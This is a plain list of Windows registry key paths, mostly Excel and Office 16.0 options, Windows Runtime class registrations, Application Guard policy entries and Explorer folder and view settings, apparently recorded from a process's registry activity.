HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableAnimations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Xlstart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AltStartup
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\CoauthDebugMode
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo\UserName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UserInfo\UserInitials
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_17407
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\AllowUserDefinedFileShareCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\DisableAllCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\DisableOMEXCatalogs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\RequireServerVerification
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RequireForceRefreshAtBoot
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_RibbonCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\ExcelOMEXRefreshPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Excel_AggregatedCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableCoauthLegacyVersionMitigation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\XLDesktopCoauthActive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClusterConnector
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DoNotCheckIfOfficeIsHTMLEditor
HKEY_LOCAL_MACHINE\Software\Classes\.htm\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\htmlfile\shell\print\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\16\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\.mht\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\edit\command\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\mhtmlfile\shell\print\command\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\OnlinePollTimeMs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Application Guard PreWarm
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Isolation.IsolatedWindowsEnvironmentHost\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.Authentication.Web.Core.WebTokenRequestResult\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonObject\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\PolicyType
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Behavior
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\MergeAlgorithm
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirectMapped
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\RegKeyPathRedirect
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyname
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicypath
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicyismultisz
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\grouppolicymultiszSeparatorChar
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataUser
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataDevice
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\ADMXMetadataBoth
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\7DValue
HKEY_LOCAL_MACHINE\Software\Microsoft\PolicyManager\default\AppHVSI\AllowAppHVSI\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ShownFirstRunOptin
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\AcceptAllEulas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EulasSetAccepted
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Privacy\UserCCSDisabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88D96A05-F192-11D4-A65F-0040963251E5}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\IsVailContainer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Input\ResyncResetTime
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Input\MaxResyncAttempts
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonValue\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSentinelFile
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\RequiredFile
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\EXCEL.EXE\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\Namespace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\MonitorRegistry
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedPC\SharedPCMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HubMode
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\FolderValueFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\ValidateRegItems
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\MonitorRegistry
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{c0a8b6a3-0000-0000-0000-300300000000}\Generation
HKEY_LOCAL_MACHINE\Software\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer\UseFindFirstFileEnumeration
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\EmulateOLS
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar
HKEY_LOCAL_MACHINE\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\PublishExpandedPath
